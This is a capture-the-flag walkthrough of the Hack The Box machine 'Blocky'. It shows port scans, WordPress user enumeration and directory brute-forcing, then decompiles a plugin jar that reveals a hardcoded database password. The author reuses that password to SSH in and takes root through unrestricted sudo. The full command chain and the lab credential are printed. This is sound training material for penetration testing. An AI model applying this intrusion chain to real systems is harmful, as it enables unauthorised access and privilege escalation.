HTB - Blocky

Getting Root:

Found a file under /plugins which contained credentials to phpMyAdmin
Found a user named notch from the WordPress Scan and was able to ssh to the box using the password found on the file from step 1
The user had ALL ALL on the sudoers file and we were able to get root.

Tools Used:

wpscan, dirsearch.py, jar, javap

Nmap

nmap -sC -sV -p- 10.10.10.37 -oA nmap/Blocky.allports                                                                                                          
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 00:30 EDT
Nmap scan report for 10.10.10.37
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.88 seconds

Enumeration

WPScan

Found a user named: notch

wpscan --url http://10.10.10.37 -e                                                                                                                             
_______________________________________________________________                                                                                                                               
         __          _______   _____                                                                                                                                                          
         \ \        / /  __ \ / ____|                                                                                                                                                         
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                                                                        
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                         
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                        
                                                                                                                                                                                              
         WordPress Security Scanner by the WPScan Team                                                                                                                                        
                         Version 3.7.11                                                                                                                                                       
       Sponsored by Automattic - https://automattic.com/                                                                                                                                      
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                                                                                                                                        
_______________________________________________________________                                                                                                                               
                                                                                                                                                                                              
[+] URL: http://10.10.10.37/ [10.10.10.37]                                                                                                                                                    
[+] Started: Tue Mar 31 01:42:55 2020                                                                                                                                                         
                                                                                                                                                                                              
Interesting Finding(s):  

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Dirsearch.py

# dirsearch.py -u http://10.10.10.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E --plain-text-report Blocky_Dirb.txt  

200   51KB   http://10.10.10.37:80/
301   309B   http://10.10.10.37:80/wiki
301   315B   http://10.10.10.37:80/wp-content
301   312B   http://10.10.10.37:80/plugins
301   316B   http://10.10.10.37:80/wp-includes
301   315B   http://10.10.10.37:80/javascript
301   313B   http://10.10.10.37:80/wp-admin
301   315B   http://10.10.10.37:80/phpmyadmin
403   299B   http://10.10.10.37:80/server-status

There were two files under http://10.10.10.37/plugins and decided to have a look.

Downloaded the two files checked for anything interesting:

# The two downlaoded files
BlockyCore.jar
griefprevention-1.11.2-3.1.1.298.jar


# To look at their contents we can use:
jar -tf BlockyCore.jar 
# The result is something like:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/MANIFEST.MF
com/myfirstplugin/BlockyCore.class

# We can use the javap to disassemble the class files
javap -c com/myfirstplugin/BlockyCore.class

# That produced the following output
Compiled from "BlockyCore.java"
public class com.myfirstplugin.BlockyCore {
  public java.lang.String sqlHost;

  public java.lang.String sqlUser;

  public java.lang.String sqlPass;

  public com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."<init>":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return

Credentials:

`root:8YsqfCTnvxAUeduzjNSXe22`

Exploitation

Using those credentials, we can login to phpMyAdmin

However using that password with the user notch (we found it from the WPScan), we can successfully ssh to the box and get the user flag.

ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Mar 31 01:00:33 2020 from 10.10.14.3
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Privilege Escalation

notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ 
notch@Blocky:~$ 
notch@Blocky:~$ sudo su -
root@Blocky:~# 
root@Blocky:~# id 
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# 
root@Blocky:~#

PreviousHTB - Mirai NextHTB - Teacher

Last updated 5 years ago